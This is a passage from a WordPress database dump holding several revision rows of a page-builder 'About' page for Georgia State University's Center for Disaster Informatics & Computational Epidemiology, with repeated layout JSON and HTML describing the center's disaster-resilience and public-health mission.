h-col-lg-auto h-col-md-auto h-col-auto style-318-outer style-local-122-c39-outer\">\n <div data-colibri-id=\"122-c39\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c39 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c40\" class=\"h-text h-text-component style-319 style-local-122-c40 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources\n or health services</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:12:26','2022-02-16 18:12:26','',122,'https://gsudice.dataconn.net/?p=354',0,'revision','',0),(360,1,'2022-02-16 18:14:45','2022-02-16 18:14:45','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":0,\"id\":\"122-c9\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":1,\"id\":\"122-c10\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c8\",\"index\":2,\"id\":\"122-c11\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c6\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c16\",\"parentId\":\"122-c14\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c16\",\"index\":0,\"id\":\"122-c17\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c16\",\"index\":2,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c13\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c43\",\"parentId\":\"122-c42\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c43\",\"index\":0,\"id\":\"122-c45\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c42\",\"parentId\":\"122-c35\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c40\",\"parentId\":\"122-c39\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The center\\u2019s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions\\u2019 resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services<\\/p>\"}}],\"id\":\"122-c39\",\"parentId\":\"122-c38\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c35\",\"index\":0,\"id\":\"122-c38\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c35\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-02-16 18:14:45','2022-02-16 18:14:45','',353,'https://gsudice.dataconn.net/?p=360',0,'revision','',0),(361,1,'2022-02-16 18:14:45','2022-02-16 18:14:45','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c6\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c6 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c7\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c7 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c9\" class=\"h-global-transition-all h-heading style-288 style-local-122-c9 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c9\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c10\" class=\"h-global-transition-all h-heading style-289 style-local-122-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c10\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c11\" class=\"h-text h-text-component style-290 style-local-122-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters,\n it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c13\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c13 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c14\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c14 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c15-outer\">\n <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c16-outer\">\n <div data-colibri-id=\"122-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-global-transition-all h-heading style-296 style-local-122-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c17\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c19\" class=\"h-text h-text-component style-298 style-local-122-c19 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c35\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c42\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c42 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c43-outer\">\n <div data-colibri-id=\"122-c43\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c43 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c45\" class=\"h-global-transition-all h-heading style-324 style-local-122-c45 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c45\">\n <!---->\n <!---->\n <h1 class=\"\">Our Mission</h1>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c38\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c38 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-center align-items-md-center align-items-center gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto align-self-lg-center align-self-md-center align-self-center style-318-outer style-local-122-c39-outer\">\n <div data-colibri-id=\"122-c39\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-318 style-local-122-c39 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c40\" class=\"h-text h-text-component style-319 style-local-122-c40 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The center’s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions’ resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources\n or health services</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-02-16 18:14:45','2022-02-16 18:14:45','',122,'https://gsudice.dataconn.net/?p=361',0,'revision','',0),(367,1,'2022-02-16 18:14:58','2022-02-16 18:14:58','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c7\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":0,\"id\":\"122-c9\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c8\",\"index\":1,\"id\":\"122-c10\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c8\",\"index\":2,\"id\":\"122-c11\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters, it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region<\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c12\",\"parentId\":\"122-c7\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c7\",\"parentId\":\"122-c6\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c6\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c15\",\"parentId\":\"122-c14\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c16\",\"parentId\":\"122-c14\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c16\",\"index\":0,\"id\":\"122-c17\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c16\",\"index\":2,\"id\":\"122-c19\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c14\",\"parentId\":\"122-c13\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c13\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Custom\",\"attrs\":{\"id\":\"custom\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c43\",\"parentId\":\"122-c42\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"slot\":null,\"parentId\":\"122-c43\",\"index\":0,\"id\":\"122-c45\",\"partialId\":122,\"styleRef\":324,\"type\":\"content\",\"props\":{\"content\":\"Our Mission\"}}],\"styleRef\":322,\"type\":\"content\"}],\"id\":\"122-c42\",\"parentId\":\"122-c35\",\"partialId\":122,\"styleRef\":321,\"type\":\"content\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"100\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"id\":\"122-c40\",\"parentId\":\"122-c39\",\"partialId\":122,\"styleRef\":319,\"type\":\"content\",\"props\":{\"content\":\"<p>The center\\u2019s mission is to consolidate expertise from multiple disciplines to identify determinants that impede regions\\u2019 resilience to natural or human-made disasters or indicate the existence of access disparities to mitigation resources or health services<\\/p>\"}}],\"id\":\"122-c39\",\"parentId\":\"122-c38\",\"partialId\":122,\"styleRef\":318,\"type\":\"content\"}],\"parentId\":\"122-c35\",\"index\":0,\"id\":\"122-c38\",\"partialId\":122,\"styleRef\":317,\"type\":\"content\"}],\"id\":\"122-c35\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":314,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-02-16 18:14:58','2022-02-16 18:14:58','',353,'https://gsudice.dataconn.net/?p=367',0,'revision','',0),(368,1,'2022-02-16 18:14:58','2022-02-16 18:14:58','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c6\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c6 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c7\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c7 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c8-outer\">\n <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c9\" class=\"h-global-transition-all h-heading style-288 style-local-122-c9 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-288 style-local-122-c9\">\n <!---->\n <!---->\n <h5 class=\"\">Who are we?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c10\" class=\"h-global-transition-all h-heading style-289 style-local-122-c10 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-289 style-local-122-c10\">\n <!---->\n <!---->\n <h4 class=\"\">The Center for Disaster Informatics & Computational Epidemiology (DICE) at Georgia State University</h4>\n </div>\n </div>\n <div data-colibri-id=\"122-c11\" class=\"h-text h-text-component style-290 style-local-122-c11 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. To mount an effective response to disasters,\n it is imperative that regional public health departments continuously engage in the development of mitigation strategies for various hazards that may affect the region</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c12-outer\">\n <div data-colibri-id=\"122-c12\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c12 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c13\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c13 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c14\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c14 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c15-outer\">\n <div data-colibri-id=\"122-c15\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c15 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c16-outer\">\n <div data-colibri-id=\"122-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c17\" class=\"h-global-transition-all h-heading style-296 style-local-122-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-296 style-local-122-c17\">\n <!---->\n <!---->\n <h5 class=\"\">What do we do?</h5>\n </div>\n </div>\n <div data-colibri-id=\"122-c19\" class=\"h-text h-text-component style-298 style-local-122-c19 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"122-c35\" id=\"custom\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-314 style-local-122-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"122-c42\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-321 style-local-122-c42 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-322-outer style-local-122-c43-outer\">\n <div data-colibri-id=\"122-c43\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-322 style-local-122-c43 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"122-c45\" class=\"h-global-transition-all h-heading style-324 style-local-122-c45 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-324 style-local-122-c45\">\n <!---->\n <!---->\n <h3 class=\"\">Our Mission</h3>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"122-c38\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-317 style-local-122-c38 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center 